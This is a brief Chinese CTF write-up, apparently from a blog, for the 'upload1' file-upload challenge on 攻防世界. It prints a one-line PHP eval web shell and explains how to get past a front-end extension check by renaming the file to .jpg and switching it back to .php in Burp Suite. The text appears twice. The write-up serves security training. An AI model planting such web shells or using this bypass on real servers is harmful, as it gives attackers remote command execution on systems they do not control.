upload1
进入环境就一个上传,我们先上传一个普通的木马文件看看
木马内容
<?php @eval($_POST["cmd"]); ?>
估计是前端校验我们查看源码
只能上传jpg和png图片,那我们将木马后缀改为.jpg然后使用bp抓包并把后缀改为.php即可
然后访问木马文件执行指令即可
执行后查看源码便发现flag
0
点赞
收藏
分享
攻防世界upload1
相关推荐
0 条评论
进入环境就一个上传,我们先上传一个普通的木马文件看看
木马内容
<?php @eval($_POST["cmd"]); ?>
估计是前端校验我们查看源码
只能上传jpg和png图片,那我们将木马后缀改为.jpg然后使用bp抓包并把后缀改为.php即可
然后访问木马文件执行指令即可
执行后查看源码便发现flag
相关推荐
